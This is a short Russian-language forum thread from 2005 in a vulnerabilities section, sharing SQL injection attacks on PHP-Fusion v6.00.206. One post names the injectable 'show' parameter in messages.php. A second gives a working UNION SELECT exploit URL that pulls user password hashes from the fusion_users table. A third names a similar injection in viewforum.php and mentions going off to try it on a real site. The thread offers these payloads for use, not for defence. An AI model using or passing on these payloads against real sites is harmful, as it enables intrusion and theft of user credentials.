Php-fusion V6.00.206

Discussion in 'Уязвимости' started by GreenBear, 26 Nov 2005.

  1. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    Code:
    http://site.ru/messages.php?folder=inbox&show='SQL-Injection
    
    P.S/ нужна быть залогиненым
     
    #1 GreenBear, 26 Nov 2005
    Last edited: 26 Nov 2005
  2. ZaCo

    ZaCo Banned

    Joined:
    20 Jun 2005
    Messages:
    737
    Likes Received:
    336
    Reputations:
    215
    Вот сплоит:
    ---
    http://127.0.0.1/php-files/messages.php?folder=inbox&show=H'%20union%20select%201,1,1,user_password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+fusion_users/*
    ---
     
  3. africanec

    africanec Banned

    Joined:
    11 Sep 2005
    Messages:
    222
    Likes Received:
    14
    Reputations:
    -3
    http://www.victim.ru/forum/viewforum.php?forum_id=1&lastvisited='sql-inj
    аналогично залогиненый только
    пошол Медведевскую проверять